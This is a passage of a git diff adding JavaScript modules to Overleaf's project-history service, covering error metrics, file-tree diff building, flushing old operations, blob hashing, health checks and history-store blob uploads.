'filestore-404', + 'Error: bad response from filestore: 500': 'filestore-500', + 'NotFoundError: got a 404 from web api': 'web-api-404', + 'OError: history store a non-success status code: 413': 'history-store-413', + 'OError: history store a non-success status code: 422': 'history-store-422', + 'OError: history store a non-success status code: 500': 'history-store-500', + 'OError: history store a non-success status code: 503': 'history-store-503', + 'Error: history store a non-success status code: 413': 'history-store-413', + 'Error: history store a non-success status code: 422': 'history-store-422', + 'Error: history store a non-success status code: 500': 'history-store-500', + 'Error: history store a non-success status code: 503': 'history-store-503', + 'Error: web returned a non-success status code: 500 (attempts: 2)': + 'web-500', + 'Error: ESOCKETTIMEDOUT': 'socket-timeout', + 'Error: no project found': 'no-project-found', + 'OpsOutOfOrderError: project structure version out of order on incoming updates': + 'incoming-project-version-out-of-order', + 'OpsOutOfOrderError: doc version out of order on incoming updates': + 'incoming-doc-version-out-of-order', + 'OpsOutOfOrderError: project structure version out of order': + 'chunk-project-version-out-of-order', + 'OpsOutOfOrderError: doc version out of order': + 'chunk-doc-version-out-of-order', + 'Error: failed to extend lock': 'lock-overrun', + 'Error: tried to release timed out lock': 'lock-overrun', + 'Error: Timeout': 'lock-overrun', + 'Error: sync ongoing': 'sync-ongoing', + 'SyncError: unexpected resyncProjectStructure update': 'sync-error', + '[object Error]': 'unknown-error-object', + 'UpdateWithUnknownFormatError: update with unknown format': + 'unknown-format', + 'Error: update with unknown format': 'unknown-format', + 'TextOperationError: The base length of the second operation has to be the target length of the first operation': + 'text-op-error', + 'Error: ENOSPC: no space left on device, write': 'ENOSPC', + '*': 'other', + } + + // set all the known errors to zero if not present (otherwise gauges stay on their last value) + const summaryCounts = {} + const summaryAttempts = {} + const summaryRequests = {} + const summaryMaxQueueSize = {} + + for (failureType in shortNames) { + label = shortNames[failureType] + summaryCounts[label] = 0 + summaryAttempts[label] = 0 + summaryRequests[label] = 0 + summaryMaxQueueSize[label] = 0 + } + + // record a metric for each type of failure + for (failureType in failureCounts) { + const failureCount = failureCounts[failureType] + label = shortNames[failureType] || shortNames['*'] + summaryCounts[label] += failureCount + summaryAttempts[label] += failureAttempts[failureType] + summaryRequests[label] += failureRequests[failureType] + summaryMaxQueueSize[label] = Math.max( + maxQueueSize[failureType], + summaryMaxQueueSize[label] + ) + } + + for (label in summaryCounts) { + const count = summaryCounts[label] + metrics.globalGauge('failed', count, 1, { status: label }) + } + + for (label in summaryAttempts) { + attempts = summaryAttempts[label] + metrics.globalGauge('attempts', attempts, 1, { status: label }) + } + + for (label in summaryRequests) { + requests = summaryRequests[label] + metrics.globalGauge('requests', requests, 1, { status: label }) + } + + for (label in summaryMaxQueueSize) { + const queueSize = summaryMaxQueueSize[label] + metrics.globalGauge('max-queue-size', queueSize, 1, { status: label }) + } + + return { + counts: summaryCounts, + attempts: summaryAttempts, + requests: 
summaryRequests, + maxQueueSize: summaryMaxQueueSize, + } +} + +// EXPORTS + +const getFailedProjectsCb = callbackify(getFailedProjects) +const getFailureRecordCb = callbackify(getFailureRecord) +const getFailuresCb = callbackify(getFailures) +const getLastFailureCb = callbackify(getLastFailure) +const recordCb = callbackify(record) +const clearErrorCb = callbackify(clearError) +const recordSyncStartCb = callbackify(recordSyncStart) +const setForceDebugCb = callbackify(setForceDebug) + +export { + getFailedProjectsCb as getFailedProjects, + getFailureRecordCb as getFailureRecord, + getLastFailureCb as getLastFailure, + getFailuresCb as getFailures, + recordCb as record, + clearErrorCb as clearError, + recordSyncStartCb as recordSyncStart, + setForceDebugCb as setForceDebug, +} + +export const promises = { + getFailedProjects, + getFailureRecord, + getLastFailure, + getFailures, + record, + clearError, + recordSyncStart, + setForceDebug, +} diff --git a/services/project-history/app/js/Errors.js b/services/project-history/app/js/Errors.js new file mode 100644 index 0000000..0b8d24b --- /dev/null +++ b/services/project-history/app/js/Errors.js @@ -0,0 +1,11 @@ +import OError from '@overleaf/o-error' + +export class NotFoundError extends OError {} +export class BadRequestError extends OError {} +export class SyncError extends OError {} +export class OpsOutOfOrderError extends OError {} +export class InconsistentChunkError extends OError {} +export class UpdateWithUnknownFormatError extends OError {} +export class UnexpectedOpTypeError extends OError {} +export class TooManyRequestsError extends OError {} +export class NeedFullProjectStructureResyncError extends OError {} diff --git a/services/project-history/app/js/FileTreeDiffGenerator.js b/services/project-history/app/js/FileTreeDiffGenerator.js new file mode 100644 index 0000000..16696c6 --- /dev/null +++ b/services/project-history/app/js/FileTreeDiffGenerator.js @@ -0,0 +1,129 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import Core from 'overleaf-editor-core' +import logger from '@overleaf/logger' +import * as Errors from './Errors.js' + +const { MoveFileOperation, AddFileOperation, EditFileOperation } = Core + +export function buildDiff(chunk, fromVersion, toVersion) { + chunk = Core.Chunk.fromRaw(chunk.chunk) + const chunkStartVersion = chunk.getStartVersion() + + const diff = _getInitialDiffSnapshot(chunk, fromVersion) + + const changes = chunk + .getChanges() + .slice(fromVersion - chunkStartVersion, toVersion - chunkStartVersion) + for (let i = 0; i < changes.length; i++) { + const change = changes[i] + for (const operation of Array.from(change.getOperations())) { + if (operation.pathname === null || operation.pathname === '') { + // skip operations for missing files + logger.warn({ diff, operation }, 'invalid pathname in operation') + } else if (operation instanceof EditFileOperation) { + _applyEditFileToDiff(diff, operation) + } else if (operation instanceof AddFileOperation) { + _applyAddFileToDiff(diff, operation) + } else if (operation instanceof MoveFileOperation) { + if (operation.isRemoveFile()) { + const deletedAtV = fromVersion + i + _applyDeleteFileToDiff(diff, operation, deletedAtV) + } else { + _applyMoveFileToDiff(diff, operation) + } + } + } + } + + return Object.values(diff) +} + +function _getInitialDiffSnapshot(chunk, fromVersion) { + // Start with a 'diff' which is snapshot of the filetree at the beginning, + // with nothing in the diff marked as changed. + // Use a bare object to protect against reserved names. + const diff = Object.create(null) + const files = _getInitialFiles(chunk, fromVersion) + for (const [pathname, file] of Object.entries(files)) { + diff[pathname] = { pathname, editable: file.isEditable() } + } + return diff +} + +function _getInitialFiles(chunk, fromVersion) { + const snapshot = chunk.getSnapshot() + const changes = chunk + .getChanges() + .slice(0, fromVersion - chunk.getStartVersion()) + snapshot.applyAll(changes) + return snapshot.fileMap.files +} + +function _applyAddFileToDiff(diff, operation) { + return (diff[operation.pathname] = { + pathname: operation.pathname, + operation: 'added', + editable: operation.file.isEditable(), + }) +} + +function _applyEditFileToDiff(diff, operation) { + const change = diff[operation.pathname] + if ((change != null ? change.operation : undefined) == null) { + // avoid exception for non-existent change + return (diff[operation.pathname] = { + pathname: operation.pathname, + operation: 'edited', + }) + } +} + +function _applyMoveFileToDiff(diff, operation) { + if ( + diff[operation.newPathname] != null && + diff[operation.newPathname].operation !== 'removed' + ) { + const err = new Errors.InconsistentChunkError( + 'trying to move to file that already exists', + { diff, operation } + ) + throw err + } + const change = diff[operation.pathname] + if (change == null) { + logger.warn({ diff, operation }, 'tried to rename non-existent file') + return + } + change.newPathname = operation.newPathname + if (change.operation === 'added') { + // If this file was added this time, just leave it as an add, but + // at the new name. 
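+    // e.g. an add of 'a.tex' followed by a move 'a.tex' -> 'b.tex'
+    // collapses into a single { pathname: 'b.tex', operation: 'added' } entry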
+ change.pathname = operation.newPathname + delete change.newPathname + } else { + change.operation = 'renamed' + } + diff[operation.newPathname] = change + return delete diff[operation.pathname] +} + +function _applyDeleteFileToDiff(diff, operation, deletedAtV) { + // avoid exception for non-existent change + if (diff[operation.pathname] != null) { + diff[operation.pathname].operation = 'removed' + } + return diff[operation.pathname] != null + ? (diff[operation.pathname].deletedAtV = deletedAtV) + : undefined +} diff --git a/services/project-history/app/js/FlushManager.js b/services/project-history/app/js/FlushManager.js new file mode 100644 index 0000000..6df3b20 --- /dev/null +++ b/services/project-history/app/js/FlushManager.js @@ -0,0 +1,142 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import async from 'async' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import metrics from '@overleaf/metrics' +import _ from 'lodash' +import * as RedisManager from './RedisManager.js' +import * as UpdatesProcessor from './UpdatesProcessor.js' +import * as ErrorRecorder from './ErrorRecorder.js' + +export function flushIfOld(projectId, cutoffTime, callback) { + if (callback == null) { + callback = function () {} + } + return RedisManager.getFirstOpTimestamp( + projectId, + function (err, firstOpTimestamp) { + if (err != null) { + return callback(OError.tag(err)) + } + // In the normal case, the flush marker will be set with the + // timestamp of the oldest operation in the queue by docupdater. + // If the marker is not set for any reason, we flush it anyway + // for safety. 
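+      // e.g. with the default maxAge of 6h, cutoffTime = now - 6h: a queue
+      // whose oldest op predates the cutoff is flushed, anything newer is
+      // skipped below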
+ if (!firstOpTimestamp || firstOpTimestamp < cutoffTime) { + logger.debug( + { projectId, firstOpTimestamp, cutoffTime }, + 'flushing old project' + ) + metrics.inc('flush-old-updates', 1, { status: 'flushed' }) + return UpdatesProcessor.processUpdatesForProject(projectId, callback) + } else { + metrics.inc('flush-old-updates', 1, { status: 'skipped' }) + return callback() + } + } + ) +} + +export function flushOldOps(options, callback) { + if (callback == null) { + callback = function () {} + } + logger.debug({ options }, 'starting flush of old ops') + // allow running flush in background for cron jobs + if (options.background) { + // return immediate response to client, then discard callback + callback(null, { message: 'running flush in background' }) + callback = function () {} + } + return RedisManager.getProjectIdsWithHistoryOps( + null, + function (error, projectIds) { + if (error != null) { + return callback(OError.tag(error)) + } + return ErrorRecorder.getFailedProjects( + function (error, projectHistoryFailures) { + if (error != null) { + return callback(OError.tag(error)) + } + // exclude failed projects already in projectHistoryFailures + const failedProjects = new Set() + for (const entry of Array.from(projectHistoryFailures)) { + failedProjects.add(entry.project_id) + } + // randomise order so we get different projects if there is a limit + projectIds = _.shuffle(projectIds) + const maxAge = options.maxAge || 6 * 3600 // default to 6 hours + const cutoffTime = new Date(Date.now() - maxAge * 1000) + const startTime = new Date() + let count = 0 + const jobs = projectIds.map( + projectId => + function (cb) { + const timeTaken = new Date() - startTime + count++ + if ( + (options != null ? options.timeout : undefined) && + timeTaken > options.timeout + ) { + // finish early due to timeout, return an error to bail out of the async iteration + logger.debug('background retries timed out') + return cb(new OError('retries timed out')) + } + if ( + (options != null ? options.limit : undefined) && + count > options.limit + ) { + // finish early due to reaching limit, return an error to bail out of the async iteration + logger.debug({ count }, 'background retries hit limit') + return cb(new OError('hit limit')) + } + if (failedProjects.has(projectId)) { + // skip failed projects + return setTimeout(cb, options.queueDelay || 100) // pause between flushes + } + return flushIfOld(projectId, cutoffTime, function (err) { + if (err != null) { + logger.warn( + { projectId, err }, + 'error flushing old project' + ) + } + return setTimeout(cb, options.queueDelay || 100) + }) + } + ) // pause between flushes + return async.series( + async.reflectAll(jobs), + function (error, results) { + const success = [] + const failure = [] + results.forEach((result, i) => { + if ( + result.error != null && + !['retries timed out', 'hit limit'].includes( + result?.error?.message + ) + ) { + // ignore expected errors + return failure.push(projectIds[i]) + } else { + return success.push(projectIds[i]) + } + }) + return callback(error, { success, failure, failedProjects }) + } + ) + } + ) + } + ) +} diff --git a/services/project-history/app/js/HashManager.js b/services/project-history/app/js/HashManager.js new file mode 100644 index 0000000..91e77ba --- /dev/null +++ b/services/project-history/app/js/HashManager.js @@ -0,0 +1,58 @@ +/* eslint-disable + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
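+//
+// The helpers below produce git-style blob ids: sha1('blob <byteLength>\0' +
+// content), hex-encoded. A minimal sanity sketch (safe to run here because
+// function declarations are hoisted): the empty string must hash to git's
+// well-known empty-blob id.
+console.assert(
+  _getBlobHashFromString('') === 'e69de29bb2d1d6434b8b29ae775ad8c2e48c5391'
+)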
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import { promisify } from 'node:util' +import fs from 'node:fs' +import crypto from 'node:crypto' +import OError from '@overleaf/o-error' +import { pipeline } from 'node:stream' + +export function _getBlobHashFromString(string) { + const byteLength = Buffer.byteLength(string) + const hash = crypto.createHash('sha1') + hash.setEncoding('hex') + hash.update('blob ' + byteLength + '\x00') + hash.update(string, 'utf8') + hash.end() + return hash.read() +} + +export function _getBlobHash(fsPath, callback) { + return fs.stat(fsPath, function (err, stats) { + if (err != null) { + OError.tag(err, 'failed to stat file in _getBlobHash', { fsPath }) + return callback(err) + } + const byteLength = stats.size + const hash = crypto.createHash('sha1') + hash.setEncoding('hex') + hash.update('blob ' + byteLength + '\x00') + + pipeline(fs.createReadStream(fsPath), hash, err => { + if (err) { + callback( + OError.tag(err, 'error streaming file from disk', { + fsPath, + byteLength, + }) + ) + } else { + hash.end() + callback(null, hash.read(), byteLength) + } + }) + }) +} + +export const promises = { + _getBlobHash: promisify(_getBlobHash), +} diff --git a/services/project-history/app/js/HealthChecker.js b/services/project-history/app/js/HealthChecker.js new file mode 100644 index 0000000..c57f184 --- /dev/null +++ b/services/project-history/app/js/HealthChecker.js @@ -0,0 +1,78 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import { ObjectId } from './mongodb.js' +import request from 'request' +import async from 'async' +import settings from '@overleaf/settings' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import * as LockManager from './LockManager.js' + +const { port } = settings.internal.history + +export function check(callback) { + const projectId = new ObjectId(settings.history.healthCheck.project_id) + const url = `http://127.0.0.1:${port}/project/${projectId}` + logger.debug({ projectId }, 'running health check') + const jobs = [ + cb => + request.get( + { url: `http://127.0.0.1:${port}/check_lock`, timeout: 3000 }, + function (err, res, body) { + if (err != null) { + OError.tag(err, 'error checking lock for health check', { + project_id: projectId, + }) + return cb(err) + } else if ((res != null ? res.statusCode : undefined) !== 200) { + return cb(new Error(`status code not 200, it's ${res.statusCode}`)) + } else { + return cb() + } + } + ), + cb => + request.post( + { url: `${url}/flush`, timeout: 10000 }, + function (err, res, body) { + if (err != null) { + OError.tag(err, 'error flushing for health check', { + project_id: projectId, + }) + return cb(err) + } else if ((res != null ? 
res.statusCode : undefined) !== 204) { + return cb(new Error(`status code not 204, it's ${res.statusCode}`)) + } else { + return cb() + } + } + ), + cb => + request.get( + { url: `${url}/updates`, timeout: 10000 }, + function (err, res, body) { + if (err != null) { + OError.tag(err, 'error getting updates for health check', { + project_id: projectId, + }) + return cb(err) + } else if ((res != null ? res.statusCode : undefined) !== 200) { + return cb(new Error(`status code not 200, it's ${res.statusCode}`)) + } else { + return cb() + } + } + ), + ] + return async.series(jobs, callback) +} + +export function checkLock(callback) { + return LockManager.healthCheck(callback) +} diff --git a/services/project-history/app/js/HistoryApiManager.js b/services/project-history/app/js/HistoryApiManager.js new file mode 100644 index 0000000..226ce10 --- /dev/null +++ b/services/project-history/app/js/HistoryApiManager.js @@ -0,0 +1,22 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import * as WebApiManager from './WebApiManager.js' +import logger from '@overleaf/logger' + +export function shouldUseProjectHistory(projectId, callback) { + if (callback == null) { + callback = function () {} + } + return WebApiManager.getHistoryId(projectId, (error, historyId) => + callback(error, historyId != null) + ) +} diff --git a/services/project-history/app/js/HistoryBlobTranslator.js b/services/project-history/app/js/HistoryBlobTranslator.js new file mode 100644 index 0000000..b0a6d4b --- /dev/null +++ b/services/project-history/app/js/HistoryBlobTranslator.js @@ -0,0 +1,123 @@ +// @ts-check + +import { + Range, + TrackedChange, + TrackedChangeList, + CommentList, + Comment, + TrackingProps, +} from 'overleaf-editor-core' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' + +/** + * @import { AddDocUpdate } from './types' + * @import { CommentRawData, TrackedChangeRawData } from 'overleaf-editor-core/lib/types' + */ + +/** + * + * @param {AddDocUpdate} update + * @returns {{trackedChanges: TrackedChangeRawData[], comments: CommentRawData[]} | undefined} + */ +export function createRangeBlobDataFromUpdate(update) { + logger.debug({ update }, 'createBlobDataFromUpdate') + + if (update.doc == null || update.docLines == null) { + throw new OError('Not an AddFileUpdate') + } + if ( + !update.ranges || + (update.ranges.changes == null && update.ranges.comments == null) + ) { + return undefined + } + + if ( + (!update.ranges.changes || update.ranges.changes.length === 0) && + (!update.ranges.comments || update.ranges.comments.length === 0) + ) { + return undefined + } + + const sortedRanges = [...(update.ranges.changes || [])].sort((a, b) => { + if (a.op.p !== b.op.p) { + return a.op.p - b.op.p + } + if ('i' in a.op && a.op.i != null && 'd' in b.op && b.op.d != null) { + // Move deletes before inserts + return 1 + } + return -1 + }) + + const tcList = new TrackedChangeList([]) + + for (const change of sortedRanges) { + if ('d' in change.op && change.op.d != null) { + const length = change.op.d.length + const range = new Range(change.op.hpos ?? 
change.op.p, length) + tcList.add( + new TrackedChange( + range, + new TrackingProps( + 'delete', + change.metadata.user_id, + new Date(change.metadata.ts) + ) + ) + ) + } else if ('i' in change.op && change.op.i != null) { + const length = change.op.i.length + const range = new Range(change.op.hpos ?? change.op.p, length) + tcList.add( + new TrackedChange( + range, + new TrackingProps( + 'insert', + change.metadata.user_id, + new Date(change.metadata.ts) + ) + ) + ) + } + } + const comments = [...(update.ranges.comments || [])].sort((a, b) => { + return a.op.p - b.op.p + }) + + /** @type {Map<string, {ranges: Range[], resolved: boolean}>} */ + const commentMap = new Map() + for (const comment of comments) { + const id = comment.op.t + if (!commentMap.has(id)) { + commentMap.set(id, { + ranges: [], + resolved: comment.op.resolved ?? false, + }) + } + const entry = commentMap.get(id) + if (!entry) { + throw new Error('Comment entry not found') + } + if (entry.resolved !== (comment.op.resolved ?? false)) { + throw new Error('Mismatching resolved status for comment') + } + + const commentLength = comment.op.c.length + if (commentLength > 0) { + // Empty comments in operations are translated to detached comments + const range = new Range(comment.op.hpos ?? comment.op.p, commentLength) + entry.ranges.push(range) + } + } + const commentList = new CommentList( + [...commentMap.entries()].map( + ([id, commentObj]) => + new Comment(id, commentObj.ranges, commentObj.resolved) + ) + ) + + return { trackedChanges: tcList.toRaw(), comments: commentList.toRaw() } +} diff --git a/services/project-history/app/js/HistoryStoreManager.js b/services/project-history/app/js/HistoryStoreManager.js new file mode 100644 index 0000000..fe9c9e3 --- /dev/null +++ b/services/project-history/app/js/HistoryStoreManager.js @@ -0,0 +1,625 @@ +import { promisify } from 'node:util' +import fs from 'node:fs' +import request from 'request' +import stream from 'node:stream' +import logger from '@overleaf/logger' +import _ from 'lodash' +import { URL } from 'node:url' +import OError from '@overleaf/o-error' +import Settings from '@overleaf/settings' +import { + fetchStream, + fetchNothing, + RequestFailedError, +} from '@overleaf/fetch-utils' +import * as Versions from './Versions.js' +import * as Errors from './Errors.js' +import * as LocalFileWriter from './LocalFileWriter.js' +import * as HashManager from './HashManager.js' +import * as HistoryBlobTranslator from './HistoryBlobTranslator.js' +import { promisifyMultiResult } from '@overleaf/promise-utils' + +const HTTP_REQUEST_TIMEOUT = Settings.overleaf.history.requestTimeout + +/** + * Container for functions that need to be mocked in tests + * + * TODO: Rewrite tests in terms of exported functions only + */ +export const _mocks = {} + +class StringStream extends stream.Readable { + _read() {} +} + +_mocks.getMostRecentChunk = (projectId, historyId, callback) => { + const path = `projects/${historyId}/latest/history` + logger.debug({ projectId, historyId }, 'getting chunk from history service') + _requestChunk({ path, json: true }, callback) +} + +/** + * @param {Callback} callback + */ +export function getMostRecentChunk(projectId, historyId, callback) { + _mocks.getMostRecentChunk(projectId, historyId, callback) +} + +/** + * @param {Callback} callback + */ +export function getChunkAtVersion(projectId, historyId, version, callback) { + const path = `projects/${historyId}/versions/${version}/history` + logger.debug( + { projectId, historyId, version }, + 'getting chunk 
from history service for version' + ) + _requestChunk({ path, json: true }, callback) +} + +export function getMostRecentVersion(projectId, historyId, callback) { + getMostRecentChunk(projectId, historyId, (error, chunk) => { + if (error) { + return callback(OError.tag(error)) + } + const mostRecentVersion = + chunk.chunk.startVersion + (chunk.chunk.history.changes || []).length + const lastChange = _.last( + _.sortBy(chunk.chunk.history.changes || [], x => x.timestamp) + ) + // find the latest project and doc versions in the chunk + _getLatestProjectVersion(projectId, chunk, (err1, projectVersion) => + _getLatestV2DocVersions(projectId, chunk, (err2, v2DocVersions) => { + // return the project and doc versions + const projectStructureAndDocVersions = { + project: projectVersion, + docs: v2DocVersions, + } + callback( + err1 || err2, + mostRecentVersion, + projectStructureAndDocVersions, + lastChange, + chunk + ) + }) + ) + }) +} + +/** + * @param {string} projectId + * @param {string} historyId + * @param {Object} opts + * @param {boolean} [opts.readOnly] + * @param {(error: Error, rawChunk?: { startVersion: number, endVersion: number, endTimestamp: Date}) => void} callback + */ +export function getMostRecentVersionRaw(projectId, historyId, opts, callback) { + const path = `projects/${historyId}/latest/history/raw` + logger.debug( + { projectId, historyId }, + 'getting raw chunk from history service' + ) + const qs = opts.readOnly ? { readOnly: true } : {} + _requestHistoryService({ path, json: true, qs }, (err, body) => { + if (err) return callback(OError.tag(err)) + const { startVersion, endVersion, endTimestamp } = body + callback(null, { + startVersion, + endVersion, + endTimestamp: new Date(endTimestamp), + }) + }) +} + +function _requestChunk(options, callback) { + _requestHistoryService(options, (err, chunk) => { + if (err) { + return callback(OError.tag(err)) + } + if ( + chunk == null || + chunk.chunk == null || + chunk.chunk.startVersion == null + ) { + const { path } = options + return callback(new OError('unexpected response', { path })) + } + callback(null, chunk) + }) +} + +function _getLatestProjectVersion(projectId, chunk, callback) { + // find the initial project version + const projectVersionInSnapshot = chunk.chunk.history.snapshot?.projectVersion + let projectVersion = projectVersionInSnapshot + const chunkStartVersion = chunk.chunk.startVersion + // keep track of any first error + let error = null + // iterate over the changes in chunk to find the most recent project version + for (const [changeIdx, change] of ( + chunk.chunk.history.changes || [] + ).entries()) { + const projectVersionInChange = change.projectVersion + if (projectVersionInChange != null) { + if ( + projectVersion != null && + Versions.lt(projectVersionInChange, projectVersion) + ) { + if (!error) { + error = new Errors.OpsOutOfOrderError( + 'project structure version out of order', + { + projectId, + chunkStartVersion, + projectVersionInSnapshot, + changeIdx, + projectVersion, + projectVersionInChange, + } + ) + } + } else { + projectVersion = projectVersionInChange + } + } + } + callback(error, projectVersion) +} + +function _getLatestV2DocVersions(projectId, chunk, callback) { + // find the initial doc versions (indexed by docId as this is immutable) + const v2DocVersions = + (chunk.chunk.history.snapshot && + chunk.chunk.history.snapshot.v2DocVersions) || + {} + // keep track of any errors + let error = null + // iterate over the changes in the chunk to find the most recent doc versions + for 
(const change of chunk.chunk.history.changes || []) { + if (change.v2DocVersions != null) { + for (const docId in change.v2DocVersions) { + const docInfo = change.v2DocVersions[docId] + const { v } = docInfo + if ( + v2DocVersions[docId] && + v2DocVersions[docId].v != null && + Versions.lt(v, v2DocVersions[docId].v) + ) { + if (!error) { + logger.warn( + { + projectId, + docId, + changeVersion: docInfo, + previousVersion: v2DocVersions[docId], + }, + 'doc version out of order in chunk' + ) + error = new Errors.OpsOutOfOrderError('doc version out of order') + } + } else { + v2DocVersions[docId] = docInfo + } + } + } + } + callback(error, v2DocVersions) +} + +export function getProjectBlob(historyId, blobHash, callback) { + logger.debug({ historyId, blobHash }, 'getting blob from history service') + _requestHistoryService( + { path: `projects/${historyId}/blobs/${blobHash}` }, + callback + ) +} + +/** + * @param {Callback} callback + */ +export function getProjectBlobStream(historyId, blobHash, callback) { + const url = `${Settings.overleaf.history.host}/projects/${historyId}/blobs/${blobHash}` + logger.debug( + { historyId, blobHash }, + 'getting blob stream from history service' + ) + fetchStream(url, getHistoryFetchOptions()) + .then(stream => { + callback(null, stream) + }) + .catch(err => callback(OError.tag(err))) +} + +export function sendChanges( + projectId, + historyId, + changes, + endVersion, + callback +) { + logger.debug( + { projectId, historyId, endVersion }, + 'sending changes to history service' + ) + _requestHistoryService( + { + path: `projects/${historyId}/legacy_changes`, + qs: { end_version: endVersion }, + method: 'POST', + json: changes, + }, + error => { + if (error) { + OError.tag(error, 'failed to send changes to v1', { + projectId, + historyId, + endVersion, + errorCode: error.code, + statusCode: error.statusCode, + body: error.body, + }) + return callback(error) + } + callback() + } + ) +} + +function createBlobFromString(historyId, data, fileId, callback) { + const stringStream = new StringStream() + stringStream.push(data) + stringStream.push(null) + LocalFileWriter.bufferOnDisk( + stringStream, + '', + fileId, + (fsPath, cb) => { + _createBlob(historyId, fsPath, cb) + }, + callback + ) +} + +function _checkBlobExists(historyId, hash, callback) { + if (!hash) return callback(null, false) + const url = `${Settings.overleaf.history.host}/projects/${historyId}/blobs/${hash}` + fetchNothing(url, { + method: 'HEAD', + ...getHistoryFetchOptions(), + }) + .then(res => { + callback(null, true) + }) + .catch(err => { + if (err instanceof RequestFailedError && err.response.status === 404) { + return callback(null, false) + } + callback(OError.tag(err), false) + }) +} + +function _rewriteFilestoreUrl(url, projectId, callback) { + if (!url) { + return { fileId: null, filestoreURL: null } + } + // Rewrite the filestore url to point to the location in the local + // settings for this service (this avoids problems with cross- + // datacentre requests when running filestore in multiple locations). 
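+  // e.g. https://filestore.other-dc.example/project/<projectId>/file/<fileId>
+  // is rebuilt as `${Settings.apis.filestore.url}/project/<projectId>/file/<fileId>`;
+  // only the pathname of the incoming url is kept (hostname here is illustrative)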
+ const { pathname: fileStorePath } = new URL(url) + const urlMatch = /^\/project\/([0-9a-f]{24})\/file\/([0-9a-f]{24})$/.exec( + fileStorePath + ) + if (urlMatch == null) { + return callback(new OError('invalid file for blob creation')) + } + if (urlMatch[1] !== projectId) { + return callback(new OError('invalid project for blob creation')) + } + + const fileId = urlMatch[2] + const filestoreURL = `${Settings.apis.filestore.url}/project/${projectId}/file/${fileId}` + return { filestoreURL, fileId } +} + +export function createBlobForUpdate(projectId, historyId, update, callback) { + callback = _.once(callback) + + if (update.doc != null && update.docLines != null) { + let ranges + try { + ranges = HistoryBlobTranslator.createRangeBlobDataFromUpdate(update) + } catch (error) { + return callback(error) + } + createBlobFromString( + historyId, + update.docLines, + `project-${projectId}-doc-${update.doc}`, + (err, fileHash) => { + if (err) { + return callback(err) + } + if (ranges) { + createBlobFromString( + historyId, + JSON.stringify(ranges), + `project-${projectId}-doc-${update.doc}-ranges`, + (err, rangesHash) => { + if (err) { + return callback(err) + } + logger.debug( + { fileHash, rangesHash }, + 'created blobs for both ranges and content' + ) + return callback(null, { file: fileHash, ranges: rangesHash }) + } + ) + } else { + logger.debug({ fileHash }, 'created blob for content') + return callback(null, { file: fileHash }) + } + } + ) + } else if ( + update.file != null && + (update.url != null || update.createdBlob) + ) { + const { fileId, filestoreURL } = _rewriteFilestoreUrl( + update.url, + projectId, + callback + ) + _checkBlobExists(historyId, update.hash, (err, blobExists) => { + if (err) { + return callback( + new OError( + 'error checking whether blob exists', + { projectId, historyId, update }, + err + ) + ) + } else if (blobExists) { + logger.debug( + { projectId, fileId, update }, + 'Skipping blob creation as it has already been created' + ) + return callback(null, { file: update.hash }) + } else if (update.createdBlob) { + logger.warn( + { projectId, fileId, update }, + 'created blob does not exist, reading from filestore' + ) + } + + if (!filestoreURL) { + return callback( + new OError('no filestore URL provided and blob was not created') + ) + } + if (!Settings.apis.filestore.enabled) { + return callback(new OError('blocking filestore read', { update })) + } + + fetchStream(filestoreURL, { + signal: AbortSignal.timeout(HTTP_REQUEST_TIMEOUT), + }) + .then(stream => { + LocalFileWriter.bufferOnDisk( + stream, + filestoreURL, + `project-${projectId}-file-${fileId}`, + (fsPath, cb) => { + _createBlob(historyId, fsPath, cb) + }, + (err, fileHash) => { + if (err) { + return callback(err) + } + if (update.hash && update.hash !== fileHash) { + logger.warn( + { projectId, fileId, webHash: update.hash, fileHash }, + 'hash mismatch between web and project-history' + ) + } + logger.debug({ fileHash }, 'created blob for file') + callback(null, { file: fileHash }) + } + ) + }) + .catch(err => { + if ( + err instanceof RequestFailedError && + err.response.status === 404 + ) { + logger.warn( + { projectId, historyId, filestoreURL }, + 'File contents not found in filestore. 
Storing in history as an empty file' + ) + const emptyStream = new StringStream() + LocalFileWriter.bufferOnDisk( + emptyStream, + filestoreURL, + `project-${projectId}-file-${fileId}`, + (fsPath, cb) => { + _createBlob(historyId, fsPath, cb) + }, + (err, fileHash) => { + if (err) { + return callback(err) + } + logger.debug({ fileHash }, 'created empty blob for file') + callback(null, { file: fileHash }) + } + ) + emptyStream.push(null) // send an EOF signal + } else { + callback(OError.tag(err, 'error from filestore', { filestoreURL })) + } + }) + }) + } else { + const error = new OError('invalid update for blob creation') + callback(error) + } +} + +function _createBlob(historyId, fsPath, _callback) { + const callback = _.once(_callback) + + HashManager._getBlobHash(fsPath, (error, hash, byteLength) => { + if (error) { + return callback(OError.tag(error)) + } + const outStream = fs.createReadStream(fsPath) + + logger.debug( + { fsPath, historyId, hash, byteLength }, + 'sending blob to history service' + ) + const url = `${Settings.overleaf.history.host}/projects/${historyId}/blobs/${hash}` + fetchNothing(url, { + method: 'PUT', + body: outStream, + headers: 